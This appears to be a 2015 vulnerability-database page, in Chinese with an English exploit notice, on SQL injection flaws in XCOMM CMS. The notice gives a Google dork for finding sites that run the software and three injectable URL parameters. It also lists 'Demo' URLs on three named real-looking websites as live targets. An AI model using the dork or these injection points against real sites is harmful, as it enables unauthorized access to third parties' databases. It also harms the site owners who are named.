XCOMM CMS Sql Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041147 漏洞类型
发布时间 2015-10-01 更新时间 2015-10-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100001
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################
# Exploit Title :  XCOMM CMS Sql Injection
# Exploit Author : DigiBoys UnderGround Team
# Vendor Homepage :  xcomm.net.pk
# Google Dork :  inurl:'writeup.php?wid=' & inurl:'products.php?IDZ=1' & inurl:'/products.php?IDZ=1-2-0-0-0-0-1'
# Date:  2015/1/10
# Tested On : Kali 2.0 - Chromium
#
######################
# Vulnerablity 1 : localhost/writeup.php?wid=1'
# Vulnerablity 2 : localhost/products.php?IDZ=1-2-0-0-0-0-1'
# Vulnerablity 3 : localhost/products.php?IDZ=1'
#
# Demo :
#
# Vulnerablity 1 : www.siwijas.com/writeup.php?wid=1'
# Vulnerablity 2 : www.fircosfashion.com/product_detail.php?IDZ=5'
# Vulnerablity 3 : www.safnimpex.com/products.php?IDZ=1'
#
######################
# discovered by : BadBoy17
# Gmail : Digi0days@Gmail.com
######################